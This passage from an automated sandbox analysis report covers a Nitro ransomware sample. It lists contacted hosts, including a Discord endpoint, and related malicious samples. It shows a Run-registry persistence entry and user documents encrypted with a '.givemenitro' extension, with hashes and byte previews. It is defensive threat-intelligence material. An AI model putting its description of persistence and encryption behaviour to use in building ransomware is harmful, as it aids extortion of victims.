                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              54.91.59.199
                                              		api.ipify.org.herokudns.comUnited States
                                              		14618AMAZON-AESUSfalse
                                              162.159.136.232
                                              		unknownUnited States
                                              		13335CLOUDFLARENETUSfalse
                                              162.159.137.232
                                              		unknownUnited States
                                              		13335CLOUDFLARENETUSfalse
                                              162.159.138.232
                                              		canary.discord.comUnited States
                                              		13335CLOUDFLARENETUSfalse

                                              General Information

                                              Joe Sandbox Version:36.0.0 Rainbow Opal
                                              Analysis ID:709270
                                              Start date and time:2022-09-25 06:45:27 +02:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 38s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:12057ad2.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:9
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.rans.troj.winEXE@8/56@7/4
                                              EGA Information:
                                              • Successful, ratio: 66.7%
                                              HDC Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 109
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                              • Execution Graph export aborted for target 12057ad2.exe, PID 4920 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              06:46:25API Interceptor1x Sleep call for process: WMIC.exe modified
                                              06:46:26API Interceptor26x Sleep call for process: 12057ad2.exe modified
                                              06:46:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NR "C:\Users\user\AppData\Local\Temp\12057ad2.exe"
                                              06:46:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NR "C:\Users\user\AppData\Local\Temp\12057ad2.exe"

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              54.91.59.199ConsoleApp8.exeGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              if.bin.dllGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              D1768Y2157.docGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              gSbSxwWtqG.exeGet hashmaliciousBrowse
                                              • api.ipify.org/?format=xml
                                              gPZ7cR9v89.exeGet hashmaliciousBrowse
                                              • api.ipify.org/?format=xml
                                              mixshop_20211229-065147.exeGet hashmaliciousBrowse
                                              • api.ipify.org/?format=xml
                                              iff.bin.dllGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              SecuriteInfo.com.Heur.31820.docGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              229C7DF4.docGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              0617_1876522156924.docGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              Whrw7Kmlni.exeGet hashmaliciousBrowse
                                              • api.ipify.org/?format=xml
                                              gelfor.dllGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              invoice_860500.docGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              httpdGet hashmaliciousBrowse
                                              • api.ipify.org/
                                              1103_788528522604.docGet hashmaliciousBrowse
                                              • api.ipify.org/

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              api.ipify.org.herokudns.comd6214420.exeGet hashmaliciousBrowse
                                              • 3.220.57.224
                                              dq87MTBgkh.exeGet hashmaliciousBrowse
                                              • 3.232.242.170
                                              339c95f3.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              38134969.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              3ac5d389.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              d3b93beb.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              e1d7308b.exeGet hashmaliciousBrowse
                                              • 3.220.57.224
                                              34c67848.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              e6909597.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              mOVI5k0Lkx.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              23734741880309926121.htmGet hashmaliciousBrowse
                                              • 3.232.242.170
                                              sf82hcVPNc.exeGet hashmaliciousBrowse
                                              • 52.20.78.240
                                              91ebe59cde57d7f4b32203db128abccf46fcbb02da1b072edf3d21601c9a5556.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              d616314c.exeGet hashmaliciousBrowse
                                              • 3.232.242.170
                                              invoice.exeGet hashmaliciousBrowse
                                              • 3.232.242.170
                                              https://s1663143059921.lassmich.com/track/click/v2-83956858Get hashmaliciousBrowse
                                              • 3.232.242.170
                                              IMG0001909022.vbsGet hashmaliciousBrowse
                                              • 3.220.57.224
                                              Invoice-128836.htmlGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              50bddde5.exeGet hashmaliciousBrowse
                                              • 52.20.78.240
                                              SHOXZOKHMb.exeGet hashmaliciousBrowse
                                              • 52.20.78.240

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              AMAZON-AESUS400dcab6.exeGet hashmaliciousBrowse
                                              • 3.220.57.224
                                              b222b83f.exeGet hashmaliciousBrowse
                                              • 3.232.242.170
                                              d6214420.exeGet hashmaliciousBrowse
                                              • 3.220.57.224
                                              dq87MTBgkh.exeGet hashmaliciousBrowse
                                              • 3.232.242.170
                                              339c95f3.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              38134969.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              3ac5d389.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              d3b93beb.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              e1d7308b.exeGet hashmaliciousBrowse
                                              • 3.220.57.224
                                              34c67848.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              e6909597.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              o8xGwc7aHa.elfGet hashmaliciousBrowse
                                              • 52.206.106.76
                                              pBI3IgjCsT.elfGet hashmaliciousBrowse
                                              • 54.29.218.138
                                              mOVI5k0Lkx.exeGet hashmaliciousBrowse
                                              • 54.91.59.199
                                              MKSQ30QqoA.elfGet hashmaliciousBrowse
                                              • 50.19.246.19
                                              KREZopxwSW.elfGet hashmaliciousBrowse
                                              • 98.142.178.21
                                              qoOjaTj6og.elfGet hashmaliciousBrowse
                                              • 54.137.165.100
                                              https://securedfaxdocumented.taplink.ws/Get hashmaliciousBrowse
                                              • 18.205.45.130
                                              boat.x86.elfGet hashmaliciousBrowse
                                              • 54.46.158.195
                                              boat.arm6.elfGet hashmaliciousBrowse
                                              • 52.20.130.115

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0e400dcab6.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              b222b83f.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              d6214420.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              dq87MTBgkh.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              339c95f3.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              38134969.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              3ac5d389.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              d3b93beb.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              e1d7308b.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              34c67848.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              file.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              file.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              e6909597.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              file.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              file.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              file.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              file.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              file.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              file.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199
                                              file.exeGet hashmaliciousBrowse
                                              • 162.159.138.232
                                              • 54.91.59.199

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\12057ad2.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):62976
                                              Entropy (8bit):5.358315076253311
                                              Encrypted:false
                                              SSDEEP:768:sKsMqCXfVcWOWM9ZkiANIUcmsYLDwUzc80gmq3oP/oDj:sKsebM9ZkiAPcYr/0O8/on
                                              MD5:716BF12F1B7B6B04F1ACF6F8AE1EB4BB
                                              SHA1:C172A657FD1A8759BECCFF5B144F1CB20033008A
                                              SHA-256:9E801CE8AF98B3C03423F3F9B3D9B2F36AAD15A63F21523210A9517F12057AD2
                                              SHA-512:0C9DB0F2CB081E4D44095BE6D71C2AA9967B45AF9BA6676CCF8775B918C53C4BBD291315F3970EE71428CEA0BC694F2B5F87FD6BA883BC401767FB094354DB7D
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: MALWARE_Win_Nitro, Description: Detects Nitro Ransomware, Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, Author: ditekSHen
                                              • Rule: RAN_Nitro_Aug_2021_1, Description: Detect Nitro ransomware, Source: C:\Users\user\AppData\Local\Temp\12057ad2.exe, Author: Arkbird_SOLG
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 92%
                                              • Antivirus: Metadefender, Detection: 54%, Browse
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{"..........."...0.................. ... ....@.. .......................`............`.................................i...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........J...B..............}...........................................0..............(.......+L......~....o.........,0.~....r...p.(....o.....~.....o......~....(.........X....i2...(.........+...........(.........X.......i2.......~......o....o........*....................0..............(.......+P......(......,<.~....r...p.(....o.........o....~....o....Yo....~....(.........X....i2...(.........+...........(.........X.......i2.......~......o....o........*....................0..

                                              C:\Users\user\AppData\Local\Temp\12057ad2.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Users\user\Desktop\12057ad2.exe.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):32
                                              Entropy (8bit):4.875
                                              Encrypted:false
                                              SSDEEP:3:1xIBgHP5iqW:1IghiqW
                                              MD5:0F541F69672FCA17934DFB69428F9D97
                                              SHA1:6712AE28708BA21513E167D50AFF20EBF3CD59FF
                                              SHA-256:A4DE0D503FE442AB2762C6C8EC6C90B7DEB1E12ED79145D0DCCD42D474AFDFE2
                                              SHA-512:B13995E95B561376A6548ACB6C06912F09CE2C4D6FCF42AFFA53E752DD2D3D1B7CC3A001CA7EE19FAC04A490FE8F9817847ECF78C9F3349DC33FB8EF81DC295B
                                              Malicious:true
                                              Preview:d8..Ll.7.o.....y.v..~O.M.o\.py>s

                                              C:\Users\user\Documents\AQRFEVRTGL.jpg.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.790235914976103
                                              Encrypted:false
                                              SSDEEP:24:+Q8lbIAho9hYICRbVcdEmvsAT1PTR4wKaGM5sYEDBSgqFG:3ubIAho9hYDZCVx1rRtKjYcSy
                                              MD5:A119010A7740C9DA0B5A64CE4204532E
                                              SHA1:5CD8FEF001E7C432D9E46B05204B3D816C3A251F
                                              SHA-256:863A508886BA9C24BD75892CAAD0B9B17C40790D3CB35BDC5982DF816A7A21D6
                                              SHA-512:0D586AF4305F194D29DCCF005BBE0ECACCABCE0A90B1E92502E4EAE3835E62EEC38E86532D76BD222BDB610CD261B867BD03EA828762560A76A7ED86ABEB93FB
                                              Malicious:false
                                              Preview:$...E..U.p7z8.u...ftV.../.g....)..w.....a.....D$fc.I.L...q$F.....T.G........S..6.iz3...a.+.' .?.}}.ip?..N.p."Z...^l....j e...sK.....F....................7B.E.t..K.\h.....(.Y..0..........R..3[.E.3...5...;Y....a.......I....D..t.>8...u{,.._...u.n.(.r..dGz5...sP....z..t......b..*(..h../...2.....e.t.#_.$....@9.hqM.......#.........K...BS<NZa..!..I.Z..*..PI.I.q.<t?.........-.UiB..h.X... ....1.N5t5%...LK.].)..3.~.H...u.....9..R.92`Bt[Aq.P...p...[...-.0.+V......+.]._Q....\.O.9....2?T......3H.V......TVB.6[....S.7D.p.`.}zN..V0.7.)%.s..>....\.hh.X]$X.!......4..W.0a#w...E....<m.$..._.Q|}..;..WL.j..v...%T.o..W..<.y..s=...l/E.....j.0....W..5>.U.[.....p..:.<W-.4q.......h..jE.3..:&.....hzz..k.(...g.g....f..|D?..h..D[.*. >:B.Rn....{`..b<A_'......z....!....,..@./.....E.)..G.N.. x.H.]j.../8..U..7....o.}....E.BA..s.[b.o%B...4~.T..9i.a.q...%.]..Lr4.g.......~.E.V.]H...^..^...K....@"..........@.@...{i].A1ki...(.I......`rl....Ee.p...Pn.....gt.,........[.

                                              C:\Users\user\Documents\AQRFEVRTGL.mp3.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.821187460166646
                                              Encrypted:false
                                              SSDEEP:24:rZlPY++gPn0/2pkk2VneFpve/x+h7Hqic312Lcu2aUltYTf:llPY4kzneFpvmx+h7Hop/K
                                              MD5:1FFE96D70973EA4BA9E6657B6DBB14C6
                                              SHA1:60AE009DF5E066A9A37EF539416F6FA09BE36756
                                              SHA-256:951247191BE78661613D5A798F8E5997A2335E459A1F96B93626EDB89E929A8F
                                              SHA-512:49204FF982F6E4C5BFCAF3CCB4ED886E8BDD44458B155F5AAA7A487250738EDF827CB353916337BF49A41354F9A78818991484FF675437B9BBB1D2546A1012BA
                                              Malicious:false
                                              Preview:.Y%..8".5..Z...7PTaX...rj......s=EZ.,..P}.O...3I...%lEl......w..v......RD..g=..QB.q..d\..R.z..~......c....r.U7.(.B..w.u..SHgn(._.`........!5OB..?R....\......=)E~....xuW.7..|n.....k..T....,z..b.>.u..*.p.b.s9.<...?1..|...`...I0J..Y..$H....D.}.W..d%..@.^(U....S....... .^DN?(.....ZxF.......".hB}..V...w..+;..P.av..m..Z....kD,_._...^.*..=...?.d}.UP$o...<a?l7#_.......A7*.......Y....%..H..l.v..#.K...l.@z\B....L.7g..D/(...R=.....!....R......a@..R.z...:]L.w..\.U8."...0...n0.^CgH.A.a..3.|!..He2|..L.R}*....f.(2......8...w-{....D.>..F.....(&(X*$uyjuQ.*..#V.>6..8.......i....`8)qA.m.4]..n....*......,.+5.(.*o<f^.@&.....{A`x..V3..M(..>.:..5.......wx._...d.p...2n1.B.K#%...~').c.........L.iI/....]..nEB.c......>.w.\...>.E........UR.0.BD=...[D...g....a].+...N!...=..#a.*.{..~.n.@]..\.;Q4x\.*..XzxA.%.D.c.%`iA..co..V U..:....a*.....^.....I...W[8....A..o.......y..M.....G......P..>....w...S&KPTRx..P2O(...tB.w..b. ...\...a0q.PIS.M.2S.&.....}`.&.^....+.).=.p

                                              C:\Users\user\Documents\AQRFEVRTGL.pdf.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.788941520372811
                                              Encrypted:false
                                              SSDEEP:24:VfFk0i0CTaakxkCAAGEVOv5Inm9tzWYN1e:VfO0i0C1qkCAzEQvRSE1e
                                              MD5:5917969078BE8E3FC71C10E241B413BA
                                              SHA1:3E8B046E6104E4984609ED5756D0074129E3AB1A
                                              SHA-256:DA9CB73CDD05447AAD54C1DD4F32BDFB40B4D564020B487C8EDA0850CA212C0B
                                              SHA-512:D8278AA56E5A142BBAE2073C2D34F6801A0285553DFE849B9D0A1CDE414DEBA23D35034656A5D0CA0EBF3861FED2DBC76656B7E4CCE62EFC84233BCD6B2C751B
                                              Malicious:false
                                              Preview:..{...t..C{..s>..x..t..y.J...>rd...x4...E.Bv.x6Q...n.f.b......g.D.8`#.g6(w./....'..`.m.P..C.m....E..o.\.}.n...fT....w.>...MA..X.a.F.B...e......-%uS....%%.3k.!........}........vn.Z..M...Z.....}..2+l..G.c12.6.Dg.z"^:...4.J...(R....\.....EY^.....5e..g...../.^l......xP..#0.RW..H=.,a*..#Z/e\.;j.|.....[...}.Q..C.YGT.R.M...r....g...>....K3}..u.Yo.Q.g.J|.I.(P..$.Y.YML..g._^8..9y...G......M...5.s..d.`.....L>s.RPG ..h..\i...@.$Q.l.L.\.^..4.7..oT...........N...@.!N.......IZ{o..t.o.....hN....G!..NF.[.D.N.G.`.l....s...NO...NM;.O#T.......83.)]...Wv.8......DB........#>..p.!.X..n....s..T..v@{=~.-.......h7=+..Mk.#.%.0..........:...wm.`cFs+>.?b..F..a..3 .?..G.B(W....OK.....&H..`..~....E......~8+$.4\.sD...|{6...........bb...T.<..)......~..{... %...&.yO.W[..>........}z....vLN......-..[.>.|p*.mER._.B....M.P.RP...x./2.....3G...Z.............74.P._..0.9...o9....#..r..Do{..N...#26....N...GvJ...I.5...........u%'..w..R...{?...|<..T#.-._.8...K.. .......w..B?...%.

                                              C:\Users\user\Documents\BXAJUJAOEO.mp3.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.8168197959956
                                              Encrypted:false
                                              SSDEEP:24:gDjxYcOmx/LTgY1/B75jBU1+MGrhd/8rqiqX7gxrggYd91zHW0AdF:gHxEm/LT975jyqhd/Z7gxrOJHW0sF
                                              MD5:45151148B03705537F52B9AE72DF37DB
                                              SHA1:261F99A24E54C8952C5CB4C0F662DF972CB726DF
                                              SHA-256:54D6A3AA57FAB37823267803282000E3D5884A7367ADE20A241F1EEE926C96B3
                                              SHA-512:5EBA58F72C82AE9149E23AFDBFA2FEE450F449BED6EBD42908DE3B0C8B226772004867709086306863468730D3F09A2E82FCCD87B012959FE181D8619B865BD3
                                              Malicious:false
                                              Preview:..pe~.7.J..5...Q.TDt...1Q.%..l..6i..q...o......^0..>\.c...%...d.C.j...4..8.7....Q.,.9.|1...kt...Y8.%....'......Q..PnY._j.8z.*t..c..`N.M.`....q.'0I....U.C}oe3>`....-.&.Z.P|....[...`....}8I...q..mL...>..........&....'E.....x.4.2..K....`.....kP.5.:..l.5.j..05(...Rq.[....t.....G.E."Nye..M..fT.H....F..z..){...l.s..g....:.y."..a....%.....i.=[s.[.).{.a...e..p.`.wg.o..5t,..$...$.........(#0W.9.....&..^z....7l..\D.@..St..!.~.U..P~....0.J1.x.......L*.L=....}."00.....0.].w.q.B\....NPo5F5|.0Y..c..:....w.\......F..wI..Xat.ph.<.a;...mlK...Ts.'7../6+P......l..(.W.?iS!..qj............~.5.X>....?/.\...8...p.s>....E...]..b.T.b...J.Q....9.@-x..3..v...x....iY..=..|...V..Z.............h....&-.*)*....t..$.....n.p$;..o..#h.y..Q..,.....n.z...t...^h.q.7...s.Q^.K..l.....x.8.O8.........Jt......MW....[fT.%_..o.UsZ..F"4.I.....GL'.x..N.....H....@R.Ij.s.%.P..?......;}.*z......#..>&T.".].4.[..i.}N..7.2.F....../..iIx(h...H.....e$(.D.Ns..5/.)....?gO0a...m..|.YK...

                                              C:\Users\user\Documents\CZQKSDDMWR.mp3.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.834001176405737
                                              Encrypted:false
                                              SSDEEP:24:IRuX6JZI2HAIZDVcGtm+QgMr/0xAwYuIoptoxBgpIlgfDL5VEu7mDb8:zqJZjAIZZcGggMmAwYuIEiE7fEPb8
                                              MD5:A29551BD36DE23E65C2D8A7F172FFA05
                                              SHA1:FC0AEA9607A00188122A4A4298163238F164C83C
                                              SHA-256:AFE0E8B3F534A80B511C2027C663EC6BCB16146EC230D1E127A6D8842F0E14AB
                                              SHA-512:E82F58CCEBAAF561073E2DD0196D73DA8954B9A091ABB9AAFABD999E11933CB5077051271790DD262245FD95D0F3AC031C7CE241048F0F52B27B00979157B5A9
                                              Malicious:false
                                              Preview:...(6....n..4>...W......|...:.2..{Z...?.H6h.....R...L....(.N2.@.ab..C....X8....{..k.6...(S.,..zP..sP...aF..?.ghOn..0.......z9.m...X.^.9[-..KxV'1.Y.4.<E..;.\.3..R.=vR.{.j..K.W^..ip.....8..<s...W....H....'..9../.gI.g.A.I..#..2P...B.1.....p...cz=.L"&..K.,..;._&..{..#A..(.....2oW.%.'K]d.!..\...ST<..h.sw2....4..y.I..#~.p..J. .y..0....V*M.a.d!..../U.[.c..K....w.....SH.B..............K.#.Vb.~a.!/.1...rT.J?].M\..]f.S....{roL..M...~[7.4.......6.....jO\.g*...$......P..z.....<..5..2..BN..iZV..j...h+@cFXB.......=.X..7#......7WrB[.....9.. ......6.&.D...{..N.g.*....U...;L.^..I..\...}Z...z.;f.!...{.@x.kI.5o.'Y.P..=........7....c.F."-...?....o...F..^y..r.f.c=....(...Z.@..-'F......gx.g......7....,.c.D.y.?......n......V..X...}..5l>..J..;.7.-.i{)..../...p..>.[..(....6G..U....-..i.G`..GQ..<2...v>.eA...P.[.V...0.\.T.q.N...-.....B..V.@#-..(..:.j^..*......F...~.....rT......].>'..n...Wl....I.<.x...{..q....1...........B..&`(.#.Z.z.fqx....... .t.Z%..F`.o3wm ....+.....

                                              C:\Users\user\Documents\CZQKSDDMWR.pdf.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.818372867092013
                                              Encrypted:false
                                              SSDEEP:24:19+4gFpaLAUWLkohUtdqIoTgJXKHwq26dbOGaGMA/SuIw4nwc:195gvUWLkoa47Hw16MGMgS4Gwc
                                              MD5:4596ACFF2EC3B230E45AFD3B44E681DA
                                              SHA1:A55FA3DBF9AF99A1EF90E8BE7762EA4350449A52
                                              SHA-256:8783E9D87CA0403C966FF30F992D4EC2B4E135B19F494ADCF249F74F6D12A5A7
                                              SHA-512:1041101D38E8B8CA39C4E9B72B5FE2BEF3EE8909839208A109F5D2FF738F41D431EA5F89924E7B514F7A50929B262B6544F8FBA1C82A7189E416616E0069102D
                                              Malicious:false
                                              Preview:.K0W...<.+.../..,7.....;?"..w...G..$.H.._..%..?X....}....`*u....0...=.:..]m;B...B......OK.pM.g....u... ...2v..a<.6fJ.....^......y.j..wV..:.w.. .v.~.><I...D.b.S.uT&....A?..4...%...2..v....nfa..8...MJ...A..U..KU._.Ydx....3...=b<|Sx.=b...a...B80"9..m.Q.It...j........b~-.%&x0....4.-..Y.....>2.Q.>z..D..e.X._.z.R.Xn{?.}..w.m.&^...7..d.G..?....M..Y..U;.<..p...q>...t..<)....+'z.i.._.cq..f..X....0.c+..'.?1..@E..`..c..T...P........u?.............l*U_C...f..1..4<*.....RE3X.O ...HD...*....l.F<Z.G....".......a..P.X.g.<9.Ui..U............x....)..5T.h.&..;......mJ.,....L a.Za.....D.....65.-.....#Z`2. p.B,....h............T`}...(.F)9i`N.(J..iM.^..B......K..~!.z...%....\]..?...[0'...&b.s.?Xg+.H...C.)..9a.Y.....q.kdd......xOCW.[.G.0...k. .'IO.`GA.LU.*^:.y...`........-.j...Y|.4.....>._Fs.K......P].K./O.a...m.GhJ....M.EI..,.........~..=.0.....V....P.......1.=YO..p.y./3.E1..1j..n..*..G).6C..f.Z.j.......6.h.^.o.F....F3.yA..X.SW.nE....$.O.......?..v.f:19.......|;

                                              C:\Users\user\Documents\CZQKSDDMWR.xlsx.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.806618873143854
                                              Encrypted:false
                                              SSDEEP:24:G2/MCYt5RY/7yQ2Xm/6ibTa8TuP6JNsk1J/Jv+GGwi:G2DuOyQy19+Nsk1WGGd
                                              MD5:18FF6AB8669BE91A3EF97AA975408DD1
                                              SHA1:C4EBA3E3158A0F4E345705C158211815914D2F59
                                              SHA-256:CE6FB8DD4D4BC737EFF7489CDBE6786B8C2A0E95E5EB3F8F6ECB6CE5ABD2DF73
                                              SHA-512:C6D2AE6EA39853972BF16A3E5810E74F3D551612246D3C0865AFE98C4A314D63FE2C2500934BCA8D13BD4183CEF53EDCEE3906CE0BCE4A347015EBFDEF94F10E
                                              Malicious:false
                                              Preview:3..:..ut.'8.*8..+(...RB.m..bL:Zu6>.Q.p3...2.x....n6.".a_...-....X."(.7.\.#.*j......|..+?..g,.q."1R.....F...#.(}.%n0.@...G..Z....WUm...$Xx]\z=x.r....7.0..'.L3..tz...91H......0..rx}..a[Q.},g {.6...q....*.H.]c.....bM../.>.......+.Q.}..'.oq......c. ...\b.z......p.vd..N........1..b....%.....[.K.........P)]E.Sk.......!2.@=...sXI[.x.a@..Gs.xa."_n.g3<N...W...C......o...y....O...PUu....c..:.X)+.h/T...CC.........W......OhC...3=..d...d.a[..r.M..n2..X....k...n.G.._RM4+.....a.....-Z.e.O..$.W.es.$...Ft.r......o}...I.v.7[:.7...c...Dc2..].a..mBx M./.2...!....s.%..P..je.%..1.?..A.pYjCn.8w.....x.3.....J...(-B...\Y..<!y...\...,+$.....v....q.H5. /a....Z.....3#.W..FcB...]..6.....IT.".........H..`........7B..DM.L9............c....!..j..p.$PV......(R.h..*..O...vF$.g.1..[...XJv..k.$@...JaOX&[.1..*p".A...8.[1j...+.H..N.t.0HA.Wq+X..=....*.jB.o...7......j...P/.D.*n..E...K.Lv..=,..1 ;.....W.2........B.m....r....x...b..t...a..6vs:j.4I2.F....T*./.....r.!.K....9.?.

                                              C:\Users\user\Documents\DQOFHVHTMG.png.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1072
                                              Entropy (8bit):7.812063844673331
                                              Encrypted:false
                                              SSDEEP:24:3sE2UUl5ucBMFga5uiuSbbIxWon6yLFzgZFoGIYNjmdYT:cqmxMaGhuabIQon6d4GIYZeW
                                              MD5:292BBF4E3F99640CF1B857B35B71BFBC
                                              SHA1:874A53AA7F84EFEEDEDE5F03E5843C7D02C2E960
                                              SHA-256:2533DDD22A10AEBE449ACC789CBA7644E18B290AD334C93036CF5214FF0F1D17
                                              SHA-512:4BC12A1570929A55FB1625C7B007DC2A25D05482377A736A5E95F32C52ACDBCB06350619EA7F6ABD7B353D6EA86487F1F8AC32B300BD91CF6EE44A66789BFE68
                                              Malicious:false
